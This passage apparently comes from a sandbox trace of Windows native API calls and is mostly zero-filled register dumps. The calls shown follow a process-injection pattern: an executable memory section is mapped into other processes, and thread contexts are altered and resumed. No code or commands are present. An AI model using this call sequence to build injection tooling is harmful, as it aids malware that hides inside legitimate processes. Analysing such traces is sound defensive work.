[48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0169.965] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0169.966] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x119200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x11a000) returned 0x0 [0169.975] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0x138, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x119200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0xc20000, SectionOffset=0x0, ViewSize=0xde6e8*=0x11a000) returned 0x0 [0170.019] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0170.032] NtClose (Handle=0x140) returned 0x0 [0170.032] NtSetContextThread (ThreadHandle=0xb4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x26d000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0xca6707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0170.050] NtResumeThread (in: ThreadHandle=0xb4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0170.050] NtClose (Handle=0x138) returned 0x0 [0170.050] NtClose (Handle=0xb4) returned 0x0 [0170.051] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0xfa8, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0xb4) returned 0x0 [0170.051] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0170.051] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0170.052] NtReadVirtualMemory (in: ProcessHandle=0xb4, BaseAddress=0x5d5000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0170.052] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0170.055] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x888) | out: ThreadHandle=0xdea64*=0x138) returned 0x0 [0170.055] NtSuspendThread (in: ThreadHandle=0x138, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0170.055] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0xb4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x21c0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0170.064] NtGetContextThread (in: ThreadHandle=0x138, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x5d5000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, 